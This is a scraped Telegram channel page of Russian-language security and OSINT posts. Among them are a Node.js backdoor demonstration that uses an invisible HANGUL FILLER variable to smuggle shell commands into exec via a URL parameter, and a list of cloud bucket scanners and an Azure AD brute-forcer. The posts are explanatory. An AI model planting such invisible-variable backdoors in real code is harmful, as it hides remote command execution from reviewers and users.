Получи случайную криптовалюту за регистрацию!

Cybred

Логотип телеграм канала @cybred — Cybred C
Логотип телеграм канала @cybred — Cybred
Адрес канала: @cybred
Категории: Технологии
Язык: Русский
Количество подписчиков: 3.61K
Описание канала:

Админ жив. Посты будут.

Рейтинги и Отзывы

1.00

2 отзыва

Оценить канал cybred и оставить отзыв — могут только зарегестрированные пользователи. Все отзывы проходят модерацию.

5 звезд

0

4 звезд

0

3 звезд

0

2 звезд

0

1 звезд

2


Последние сообщения 3

2021-12-07 00:19:26
Vortimo - приложение для проведения онлайн расследований от основателя компании Paterva (подарившего миру Maltego) Рулофа Темминга. Поставляется в виде десктопного приложения и расширения для браузера, которое в реальном времени записывает всю вашу сессию в браузере, архивируя локально страницы и попутно анализируя контекст.

Используя регулярные выражения, отдельно выделяет все найденные контактные данные, такие как номера телефонов или адреса электронной почты для дальнейшего обогащения при помощи некоторых сервисов, вроде Dehashed, People, Riskiq (достаточно предварительно указать API-ключи). Парсит и тегирует другую информацию: ссылки, никнеймы и хэштеги.

Как и Maltego, позволяет строить графы по собранным данным, но, не поддерживает модульную систему, за счет которой можно было бы расширять базовую функциональность. Имеет несколько вариантов лицензии, каждая из которых отличается ограничениями на количество возможных проектов - поэтому все инструменты доступны сразу из коробки.
871 views21:19
Открыть/Комментировать
2021-12-05 12:50:01 Пришлось искать альтернативу старому доброму BGram T5.11.0-B6.4.0 в связи с тем, что, как уже многие из вас знают, клиенты Telegram ниже версии 8.2.7 с 1 января 2022 превратятся в тыкву (хотя они уже и сейчас перестали получать новые сообщения и посты из каналов).

Для тех, кто не знает и не пользовался, BGram - это сторонний клиент Telegram, добавляющий некоторые дополнительные фичи, самые значимые из которых: возможность узнать ID пользователя прямо из профиля, пересылка без указания автора, отдельный селектор для включения TOR, вместо прокси, вкладки для чатов и режим призрака, скрывающий онлайн.

Сегодня, вместе с пересылкой, вкладки появились уже официально, режим призрака был удален в новых версиях BGram из-за писем Дурова с угрозами выпилить (репортами в Google) клиент из Google Play, и полезных апдейтов, по сравнению с официальным клиентом, практически не осталось.

Поискав немного в сети, удалось найти ещё один сторонний клиент, который не уступает тому же BGram (да и не только), поддерживая актуальную версию Telegram и добавляя следующие функции:
— отображение удалённых сообщений
— отображение истории отредактированных сообщений
— вход с помощью токенов ботов
— id пользователя из профиля
— встроенный переводчик сообщений
— режим невидимки

Это, конечно, не все. Разработчик из Ирана очень постарался и даже добавил отдельную вкладку с национальным телевидением, и очень-очень много рекламы. Поэтому я написал небольшой мод, в котором:
— удалены все левые хосты
— удалена реклама AdMob в чатах, между чатами, в настройках
— удален личный рекламный баннер автора с ещё одной рекламой
— удалена реклама Дурова (та самая с плашкой "спонсировано")

SHA256: e2c1bbedec2c839bfb7d0ffbdae297ff333d24ce1f737086c9436786eb2dba9b
1.0K viewsedited  09:50
Открыть/Комментировать
2021-11-26 23:26:13 Один из наиболее известных способов отслеживания пользователей в интернете - использование технологии WebGL, позволяющей, помимо своего основного предназначения для работы с графикой, использовать некоторые легитимные вызовы для составления уникального отпечатка как браузера, так и машины ни о чем не подозревающего пользователя.

Вопреки его широкой известности и распространенности, в Tor Browser был найден до сих пор не исправленный баг, позволяющий однозначно идентифицировать многих его пользователей за счет использования некоторых штатных методов WebGL (часть из них по-умолчанию заблокирована или возвращает пустой ответ, часть - нет).

У Tor Project есть собственная Bug Bounty программа и, как это часто бывает, не смотря на репорты Нила Кравеца, они отказались признать это уязвимостью и выплатить вознаграждение. Однако в их багтрекере тикет с этим багом по прежнему открыт, как и многие другие, которые, как выяснилось, лежат там годами (в т.ч. критичные).

Не смотря на активное участие волонтеров и штатных разработчиков в развитии Tor Project, похоже, что само руководство в лице Роджера Дингледина (который отказался общаться напрямую) и некоторых других директоров не заинтересовано в исправлении таких проблем безопасности, вопреки красивым лозунгам о Privacy и заботе о пользователях на главной странице.

https://telegra.ph/Treking-polzovatelej-Tor-brauzera-s-pomoshchyu-WebGL-11-26
586 viewsedited  20:26
Открыть/Комментировать
2021-11-24 19:28:50 Прошла ежегодная конференция, посвященная OSINT - conINT 2021.

Некоторые темы докладов:
Rapid Rapport: the Algorithm for building trust and liking in person or online
Alice in Onionland: Brand Infringement Attribution, Traceability and Online to Offline Actionable Intelligence
Create a Raspberry Pi OSINT Lab
Darkweb intelligence and CSAM Investigations
Hunting the FBI's Most Wanted: An OSINT Case Study
OSINT on the Ocean: Maritime Intelligence Gathering Techniques
Improving Your OSINT Skills by Inconveniencing Scammers

Трансляция на твиче: https://www.twitch.tv/videos/1210896210
679 views16:28
Открыть/Комментировать
2021-11-17 17:36:00 soxoj выпустил marple - инструмент, который позволяет парсить ссылки на проиндексированные поисковиками (Google и DuckDuckGo) профили пользователей с различных сайтов по юзернеймам. Желающие могут пойти на https://github.com/soxoj/marple, клонировать и потестить. Я пока еще не пробовал, но точно знаю, что давно существует множество альтернатив.

Функционал еще довольно небольшой, но зная другие его проекты (Maigret, YaSeeker, Mailcat), надеюсь, что он будет пополняться. На данный момент возникает только единственный вопрос - почему нет ротации проксей? Работая с поисковиками, это первое, о чем стоит позаботиться, особенно на старте. И это не первый раз - в тех альтернативах, о которых я говорил вышел, если и есть поддержка прокси, то только каких-то единичных, которые вы можете указать в качестве аргумента.

А зная, как Google любит подсовывать капчи со светофорами, и количество запросов, которые нужно сделать, чтобы найти нужного «кабанчика на подскоке», юзабельность подобного софта близится к нулю. На данный момент mast have инструментом в данной области как был, так и остается Searcher. Пусть он и не умеет отделять ссылки на профили от ссылок на все остальные сайты, и вообще изначально не предназначался для OSINT, зато обладает кучей возможностей, отличающих его от большинства скриптов с гитхаба.

Собственный антипаблик, поддержка не 2х, а 40ка поисковых систем, возможность задавать самому глубину поиска и куча всего другого - то, что есть в серчере и то, что хотелось бы видеть в качестве минимального набора в выпускающихся скраперах. А marple таковым, по сути, и является - прикрути ему «неразборчивый режим», позволяющий собирать все ссылки подряд.
684 viewsedited  14:36
Открыть/Комментировать
2021-11-17 01:16:50 ⁤Интересный и относительно новый способ бэкдоринга с использованием Unicode символов.

Присмотритесь к исходному коду - видите ли вы что-нибудь подозрительное? На скриншоте - скрипт простейшего хелсчека, который визуально выглядит безобидно, и выполняет функцию проверки работоспособности сети.

Но это только на первый взгляд. Начиная с ECMAScript 2015, все символы Unicode со свойством ID_Start могут быть использованы в коде в качестве имен переменных.

Символ под названием «HANGUL FILLER» (который, к слову, если указать в качестве ника в TG, становится некликабельным при пересылке) относится к категории «Letter, other» и является визуально невидимым, но при этом имеет свойство ID_Start и может быть использован в коде в качестве имен переменных.

Снова обратимся к коду, заменив HANGUL его escape-последовательностью:

const { timeout,\u3164 } = req.query;

Параметр timeout, который мы, используя деструктуризацию, извлекаем из req.query, не является единственным. Передав в запросе, в качестве параметра, HANGUL FILLER или любой, аналогичный ему символ (например, ZERO WITH SPACE), мы присвоим его в отдельную невидимую переменную, которую мы позже поместим в массив.

const checkCommands = [
'ping -c 1 google.com',
'curl -s http://example.com/',\u3164
];

Далее каждый элемент массива попадает в функцию exec, которая, в свою очередь, выполняет переданные ей команды в шелле. Остается только передать url-encode HANGUL в качестве параметра к нашему эндпоинту и в качестве значения - команду, которую мы выполним в системе
http://host:8080/network_health?%E3%85%A4=

Огромный плюс данного подхода в том, что, кроме того, что он не виден на первый взгляд, он не виден также и при выделении текста. Даже IDE не подсвечивают и не раскрашивают такие Unicode символы, проиндексировав исходники.
1.0K viewsedited  22:16
Открыть/Комментировать
2021-10-26 00:50:52 ⁤Paliscope - еще одна Maltego-подобная платформа для проведения расследований. Позволяет собирать информацию о целях из открытых источников и делиться находками с другими исследователями.

Под капотом имеет поисковой AI-движок YOSE, умеющий агрегировать сведения из 3rd party сервисов, а также анализовать уже собранные; и Discovry - инструмент, отвечающий за хранение/менеджент собранных данных для составления кейса.

Содержит встроенный браузер с функционалом создания множества сессий, их сохранением и индексацией, поддерживается импорт различных документов, изображений, видео и почтовых сообщений. Весь найденный текст, а также объекты распознаются и также индексируется, как и информация из всех остальных медиафайлов, включая метаданные.

YOSE умеет идентифицировать: оружие, наркотики, сцены насилия и порнографию, документы, кредитные карты, деньги и прочую информацию; поддерживается импорт фотографий с лицами людей и поиск по ним (aka локальный FindFace).

На прикрепленном скриншоте - результат анализа собранных данных при помощи 4Chan-Scraper. YOSE помог отобрать информацию, относящуюся к одному конкретному человеку (в т. ч., используя контекстный анализ его постов), который занимался распространением alt-right контента на имиджборде, а также определить его криптовалютные кошельки.
670 viewsedited  21:50
Открыть/Комментировать
2021-10-18 15:01:06 Cloud Osint

В связи с относительно недавней новостью о переносе инфраструктуры NASA в облако, предлагаю вспомнить об одной из самых известных проблем в этой области - избыточных правах доступа, а также инструментов, которые позволяют автоматизировать ее поиск, используя стандартные способы подключения, протоколы и публичные API-интерфейсы.

Поисковики по общедоступным S3 Buckets:
- https://osint.sh/buckets/
- https://buckets.grayhatwarfare.com/

Bucket-краулеры на случай, если вы захотите посканить отдельные таргеты:
- https://github.com/nyxgeek/AzureAD_Autologon_Brute
- https://github.com/Parasimpaticki/sandcastle
- https://github.com/sa7mon/S3Scanner
- https://github.com/clario-tech/s3-inspector
- https://github.com/eth0izzle/bucket-stream
- https://github.com/cr0hn/festin
- https://github.com/awslabs/aws-config-rules
- https://github.com/jordanpotti/AWSBucketDump
- https://github.com/RhinoSecurityLabs/GCPBucketBrute

Также не стоит забывать, что поиск не должен ограничиваться одними лишь S3 Buckets и Blob Storage. cloud_enum - мультитул, который объединяет функции всех вышеописанных скриптов, содержит встроенный пермутатор, а также позволяет искать awsapps (WorkMail, WorkDocs, Connect и др.), базы данных, виртуальные машины, веб-приложения в Microsoft Azure и сайты, созданные в Google App Engine.

Отдельный репозиторий RedHunt Labs по Asset Discovery: https://github.com/redhuntlabs/Awesome-Asset-Discovery
1.6K views12:01
Открыть/Комментировать
2021-10-15 20:20:33 Методология поиска уязвимостей нулевого дня от RiotSecurityTeam:
https://telegra.ph/Kak-ohotitsya-na-zerodei-i-vozvrashchatsya-s-dobychej-10-15
1.1K views17:20
Открыть/Комментировать